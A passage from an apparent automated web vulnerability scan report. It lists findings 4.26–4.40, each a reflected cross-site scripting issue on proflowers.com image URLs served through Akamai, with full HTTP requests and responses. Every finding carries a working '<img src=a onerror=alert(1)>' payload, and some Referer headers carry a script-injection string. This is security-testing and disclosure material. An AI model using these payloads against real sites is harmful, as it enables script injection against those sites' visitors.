Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/F08_311626_PF799e8<img src=a onerror=alert(1)>5150b0f3d58
4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39 was submitted in the REST URL parameter 9. This input was echoed as d8768<img src=a onerror=alert(1)>6cd8c2fda39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PFd8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:02 GMT
Connection: close

Unable to find /ProvideCommerce/FD08_149362_W_2_PFd8768<img src=a onerror=alert(1)>6cd8c2fda39
4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47 was submitted in the REST URL parameter 9. This input was echoed as 5df3f<img src=a onerror=alert(1)>a18490b2d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:37 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img src=a onerror=alert(1)>a18490b2d47
4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b753f<img%20src%3da%20onerror%3dalert(1)>54a735179c was submitted in the REST URL parameter 9. This input was echoed as b753f<img src=a onerror=alert(1)>54a735179c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img%20src%3da%20onerror%3dalert(1)>54a735179c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img src=a onerror=alert(1)>54a735179c
4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3 was submitted in the REST URL parameter 9. This input was echoed as ae9c6<img src=a onerror=alert(1)>e50248b99e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:12 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img src=a onerror=alert(1)>e50248b99e3
4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea was submitted in the REST URL parameter 9. This input was echoed as 1f963<img src=a onerror=alert(1)>0abf99f1fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:15 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img src=a onerror=alert(1)>0abf99f1fea
4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19 was submitted in the REST URL parameter 9. This input was echoed as 1bd76<img src=a onerror=alert(1)>d86e9b37c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:31 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img src=a onerror=alert(1)>d86e9b37c19
4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259 was submitted in the REST URL parameter 9. This input was echoed as 34c7a<img src=a onerror=alert(1)>c0a23b23259 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:05 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img src=a onerror=alert(1)>c0a23b23259
4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84 was submitted in the REST URL parameter 9. This input was echoed as 8ece4<img src=a onerror=alert(1)>c6f0ee0aa84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img src=a onerror=alert(1)>c6f0ee0aa84
4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3 was submitted in the REST URL parameter 9. This input was echoed as 53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:59 GMT
Connection: close

Unable to find /ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3
4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839 was submitted in the REST URL parameter 9. This input was echoed as 73bd4<img src=a onerror=alert(1)>3471c81f839 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img src=a onerror=alert(1)>3471c81f839
4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028 was submitted in the REST URL parameter 9. This input was echoed as 34789<img src=a onerror=alert(1)>a33706b7028 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/GingerVase_tn34789<img src=a onerror=alert(1)>a33706b7028
4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3 was submitted in the REST URL parameter 9. This input was echoed as 55ab4<img src=a onerror=alert(1)>7e214382de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:49 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20assrt10_PF55ab4<img src=a onerror=alert(1)>7e214382de3
4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139 was submitted in the REST URL parameter 9. This input was echoed as a9baa<img src=a onerror=alert(1)>043817ff139 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PFa9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20blue_gv11_PFa9baa<img src=a onerror=alert(1)>043817ff139
4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6 was submitted in the REST URL parameter 9. This input was echoed as b58f3<img src=a onerror=alert(1)>89a2ea4ec6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:08 GMT
Connection: close

Unable to find /ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img src=a onerror=alert(1)>89a2ea4ec6
4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372 was submitted in the REST URL parameter 9. This input was echoed as 520ee<img src=a onerror=alert(1)>73aa06e9372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
